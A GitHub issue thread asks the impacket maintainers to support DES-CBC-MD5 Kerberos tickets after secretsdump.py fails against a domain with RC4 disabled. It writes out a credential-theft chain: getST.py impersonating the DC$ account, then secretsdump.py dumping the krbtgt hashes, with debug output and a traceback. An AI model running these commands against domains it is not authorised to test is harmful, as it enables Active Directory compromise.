### ISSUE TITLE
kerberos authentication failed on secretsdump.py when disable RC4_HMAC_MD5

### ISSUE THREAD

**Issue by tuian** [SecureAuthCorp/impacket#709]
# kerberos authentication failed on secretsdump.py when disable RC4_HMAC_MD5

### 0x01 Disable rc4-hmac
- [Disable RC4-HMAC (And Others) in Active Directory](http://www.myotherpcisacloud.com/post/disable-rc4hmac-and-others-in-active-directory)
![image](https://user-images.githubusercontent.com/9986910/69780273-c778ff00-11e5-11ea-869b-5c3da14a0086.png)

### 0x02  Dump fail

![image](https://user-images.githubusercontent.com/9986910/69780458-5be36180-11e6-11ea-855b-c095000169c8.png)

```c
getST.py -spn HOST/DC.****.corp '****.corp/autogetn$' -dc-ip 192.168.44.150  -impersonate DC$
export KRB5CCNAME=DC\$.ccache
secretsdump.py -just-dc  -k -no-pass  -just-dc-user krbtgt dc.****.corp -debug
```
DC$.ccache is a `DES-CBC-MD5` ticket rather than a `rc4-hmac-MD5` ticket

So, `secretsdump.py` can not work.

```c
DES-CBC-MD5 kerberos authentication ticket
Something wen't wrong with the DRSUAPI approach
```
### 0x03 debug info

```c
➜  disable_rc4 getST.py -spn HOST/DC.****.corp '****.corp/dcadmin' -dc-ip 192.168.44.150  -impersonate DC$
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Getting TGT for user
[*] Impersonating DC$
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in DC$.ccache
➜  disable_rc4 export KRB5CCNAME=DC\$.ccache
➜  disable_rc4 secretsdump.py -just-dc  -k -no-pass  -just-dc-user krbtgt dc.****.corp -debug
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[+] Using Kerberos Cache: DC$.ccache
[+] Domain retrieved from CCache: ****.corp
[+] SPN CIFS/DC.****.corp@****.corp not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for HOST/DC.****.corp@****.corp
[+] Changing sname from HOST/DC.****.corp@****.corp to cifs/DC.****.corp@****.corp and hoping for the best
[+] Using TGS from cache
[+] Username retrieved from CCache: DC$
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Traceback (most recent call last):
  File "/Library/Python/2.7/site-packages/impacket-0.9.21.dev0-py2.7.egg/EGG-INFO/scripts/secretsdump.py", line 210, in dump
  File "build/bdist.macosx-10.15-x86_64/egg/impacket/examples/secretsdump.py", line 2419, in dump
    name=self.__justUser)
  File "build/bdist.macosx-10.15-x86_64/egg/impacket/examples/secretsdump.py", line 502, in DRSCrackNames
    self.__connectDrds()
  File "build/bdist.macosx-10.15-x86_64/egg/impacket/examples/secretsdump.py", line 437, in __connectDrds
    self.__drsr.bind(drsuapi.MSRPC_UUID_DRSUAPI)
  File "build/bdist.macosx-10.15-x86_64/egg/impacket/dcerpc/v5/rpcrt.py", line 1086, in bind
    bindResp['auth_data'])
  File "build/bdist.macosx-10.15-x86_64/egg/impacket/krb5/kerberosv5.py", line 481, in getKerberosType3
    plainText = cipher.decrypt(sessionKey, 12, cipherText)
  File "build/bdist.macosx-10.15-x86_64/egg/impacket/krb5/crypto.py", line 269, in decrypt
    if not _mac_equal(mac, expmac):
  File "build/bdist.macosx-10.15-x86_64/egg/impacket/krb5/crypto.py", line 103, in _mac_equal
    res |= x ^ y
TypeError: unsupported operand type(s) for ^: 'str' and 'str'
[-] unsupported operand type(s) for ^: 'str' and 'str'
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
```

**Comment by tuian** [comment]
CCing @asolino  :)

https://github.com/SecureAuthCorp/impacket/blob/429f97a894d35473d478cbacff5919739ae409b4/impacket/krb5/gssapi.py#L71


```c
def GSSAPI(cipher):
    if cipher.enctype == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
        return GSSAPI_AES256()
    if cipher.enctype == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
        return GSSAPI_AES128()
    elif cipher.enctype == constants.EncryptionTypes.rc4_hmac.value:
        return GSSAPI_RC4()
    else:
        raise Exception('Unsupported etype 0x%x' % cipher.enctype)
```
Is it possible to support `DES-CBC-MD5` ？
Because many administrator disabled RC4 in active dictionary.
